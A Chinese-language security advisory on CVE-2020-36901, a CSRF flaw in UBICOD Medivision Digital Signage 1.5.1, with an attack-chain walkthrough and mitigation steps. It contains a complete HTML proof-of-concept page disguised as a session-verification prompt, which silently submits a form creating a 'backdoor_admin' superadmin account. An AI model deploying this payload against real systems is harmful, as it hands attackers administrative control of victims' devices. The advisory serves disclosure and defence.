CVE-2020-36901 UBICOD Medivision Digital Signage CSRF漏洞导致管理员账户创建

漏洞信息

漏洞编号

CVE-2020-36901

漏洞类型

跨站请求伪造(CSRF)

CVSS评分

8.8 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

UBICOD Medivision Digital Signage

漏洞概述

CVE-2020-36901是UBICOD Medivision Digital Signage 1.5.1版本中存在的一个高危跨站请求伪造(CSRF)漏洞。该漏洞允许未经认证的远程攻击者通过诱导已登录的管理员访问恶意网页，在目标系统上创建具有提升权限的新管理员账户。攻击者利用Web应用程序对用户请求缺乏有效验证的缺陷，通过构造恶意HTML页面自动提交表单到管理接口的/user/itSet端点，从而在不知会受害者的情况下执行未授权的管理员账户创建操作。由于Medivision Digital Signage是一款数字标牌管理系统，广泛应用于商业广告和信息展示场景，一旦被攻击者创建后门管理员账户，将导致攻击者完全控制数字标牌内容、窃取敏感业务数据，并可能将数字标牌作为进一步渗透企业内网的跳板，对企业品牌形象和信息安全造成严重影响。

技术细节

该CSRF漏洞源于Medivision Digital Signage的Web管理界面在处理用户管理功能时缺少CSRF Token验证机制。系统通过HTTP POST请求到/query/user/itSet端点来创建新用户，攻击者可以构造一个恶意HTML页面，包含自动提交的表单，目标地址指向目标服务器的/query/user/itSet接口。表单参数包括用户基本信息如username、password、email以及权限级别参数(通常为admin或superadmin)。由于服务器端未验证请求的Referer头或Origin头，且未使用CSRF Token，浏览器在用户已登录的情况下会自动携带Cookie发送请求，导致服务器误认为是合法管理员操作。攻击者通常将恶意页面托管在外部服务器，通过钓鱼邮件或社交工程手段诱导目标管理员访问，利用JavaScript的autocomplete或自动提交功能在页面加载时立即发送恶意请求。成功利用后可获得系统完全控制权。

攻击链分析

STEP 1

侦察阶段

攻击者首先识别目标组织使用的Medivision Digital Signage系统版本，通过Shodan、ZoomEye等搜索引擎或公开信息收集目标服务器的域名和IP地址

STEP 2

恶意页面构建

攻击者创建包含自动提交表单的恶意HTML页面，表单目标地址指向目标的/query/user/itSet端点，参数包含新管理员的用户名、密码和权限设置

STEP 3

社工攻击投递

通过钓鱼邮件、即时通讯、社交媒体等渠道诱导目标管理员访问恶意页面，或将恶意链接嵌入到管理员常访问的第三方网站中

STEP 4

CSRF请求触发

当已登录的管理员浏览器加载恶意页面时，JavaScript自动提交隐藏表单，浏览器自动携带有效Session Cookie向目标服务器发送POST请求

STEP 5

账户创建成功

服务器接收到请求后因缺少CSRF验证而执行账户创建操作，攻击者获得具有superadmin权限的后门账户

STEP 6

持久化控制

攻击者使用创建的账户登录系统管理后台，完全控制数字标牌内容、窃取业务数据，并可能以该系统为跳板进一步横向移动攻击企业内网

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!DOCTYPE html> <html> <head> <title>Digital Signage System - Admin Access</title> <style> body { font-family: Arial, sans-serif; background: #f0f0f0; padding: 20px; } .exploit-container { max-width: 600px; margin: 50px auto; padding: 20px; background: white; border-radius: 5px; box-shadow: 0 2px 5px rgba(0,0,0,0.1); } h2 { color: #333; } .status { margin-top: 15px; padding: 10px; border-radius: 3px; display: none; } .success { background: #d4edda; color: #155724; } .error { background: #f8d7da; color: #721c24; } </style> </head> <body> <div class="exploit-container"> <h2>Medivision Digital Signage - System Update</h2> <p>Your administrator session requires verification for continued access.</p>  <form id="csrfForm" action="http://TARGET_HOST/query/user/itSet" method="POST" style="display:none;"> <input type="hidden" name="username" value="backdoor_admin"> <input type="hidden" name="password" value="P@ssw0rd123!"> <input type="hidden" name="email" value="[email protected]"> <input type="hidden" name="role" value="superadmin"> <input type="hidden" name="status" value="active"> </form> <div id="statusMessage" class="status"></div> <button onclick="submitExploit()" style="padding: 10px 20px; margin-top: 10px;">Verify Session</button> </div> <script> function submitExploit() { var form = document.getElementById('csrfForm'); var statusDiv = document.getElementById('statusMessage'); // Submit the CSRF form try { form.submit(); statusDiv.className = 'status success'; statusDiv.style.display = 'block'; statusDiv.innerHTML = 'Verification request sent successfully. Check your email for confirmation.'; } catch(e) { statusDiv.className = 'status error'; statusDiv.style.display = 'block'; statusDiv.innerHTML = 'Verification failed. Please contact administrator.'; } } // Auto-submit on page load (optional, commented out for stealth) // window.onload = function() { setTimeout(submitExploit, 1000); }; </script> </body> </html>

影响范围

UBICOD Medivision Digital Signage 1.5.1

防御指南

临时缓解措施

临时缓解措施：1) 在Web服务器层面配置Referer检查规则，拒绝Referer头为空或来自外部域名的管理接口请求；2) 临时禁用用户管理功能的Web访问，仅允许通过VPN或内网直接访问；3) 监控/query/user/itSet端点的访问日志，及时发现异常请求模式；4) 提醒管理员不要点击来路不明的链接，特别是要求登录的页面链接；5) 考虑暂时关闭系统对外的Web管理界面暴露，仅保留必要的业务展示功能。